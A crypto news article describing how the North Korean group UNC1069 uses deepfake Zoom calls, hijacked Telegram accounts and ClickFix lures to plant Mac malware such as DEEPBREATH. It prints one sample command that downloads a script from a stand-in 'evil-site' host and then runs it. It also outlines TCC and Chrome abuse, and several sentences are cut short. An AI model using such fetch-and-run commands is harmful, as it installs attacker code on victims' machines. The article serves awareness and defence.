
North Korean hackers are getting smarter. They now use AI deepfakes, fake Zoom calls, and fresh malware to target crypto firms and steal digital assets. A recent attack on a FinTech company in the crypto space shows their new tricks. This group, called
If you work in crypto, blockchain, or Web3, this is a wake-up call. These attacks mix old social tricks with new AI and malware. Learn how they work, what tools they use, and how to stay safe.
Crypto is perfect for them. Wallets hold big money with few checks. One stolen session token can empty accounts. This attack used tons of tools on one person’s Mac, showing they want max data for theft and more scams.
The hack started on Telegram. Hackers took over an exec’s account from a crypto firm. They messaged the victim, built trust, then sent a Calendly link for a meeting. It led to a fake Zoom at zoom[.]uswe05[.]us.
In the call, a deepfake video of another CEO appeared. Victim thought it was real. Then, fake audio issues led to a ClickFix trick. Hackers gave “troubleshooting” commands. One hid malware download.
Mac commands looked like this (simplified):
curl -o /tmp/script.sh http://evil-site/payload.sh && chmod +x /tmp/script.sh && /tmp/script.sh
Windows had similar ones. Victim ran them, starting the infection.
This mix of compromised chats, fake meetings, AI fakes, and command tricks is new.
Once inside, malware chain exploded. No EDR? No problem. Mac’s XProtect logged behaviors, helping map the attack.

DEEPBREATH is slick. It tricks Finder (with Full Disk Access) to stage TCC.db, injects perms for Desktop/Downloads, restores it. No user prompts. Then grabs all sensitive files.
Poses as docs editor. Sets native messaging at ~/Library/Application Support/Google/Chrome/NativeMessagingHosts/. JSON config for keylog, cookies, caps. Data to subdirs like “c” for Chrome.
Hunt these to spot
Tools like Google SecOps flag: TCC manip, Chrome native mods, Keychain access.
Crypto pros use Macs, Telegram, Zoom daily. Personal devices link to corp nets. Stolen data fuels more attacks.
Train staff on ClickFix. Use passwordless logins where possible.
These hackers evolve fast. From phishing to AI lures. Expect more Mac tools, cross-OS attacks. Crypto must up defenses: zero-trust, AI detection, fast IR.
Stay alert. One click can cost millions in BTC/ETH. Share IOCs, patch quick, train hard.
Protect your blockchain projects. The future of DeFi depends on it.
Discuss this news on our Telegram Community. Subscribe to us on Google news and do follow us on Twitter @Blockmanity
Did you like the news you just read? Please leave a feedback to help us serve you better
Disclaimer: Blockmanity is a news portal and does not provide any financial advice. Blockmanity's role is to inform the cryptocurrency and blockchain community about what's going on in this space. Please do your own due diligence before making any investment. Blockmanity won't be responsible for any loss of funds.
The post How UNC1069 North Korean Hackers Use AI Deepfakes and New Mac Malware to Steal Crypto appeared first on Blockmanity.
Also read: Banks Connect to XRP Ledger, Fueling Speculation of Major Capital Inflows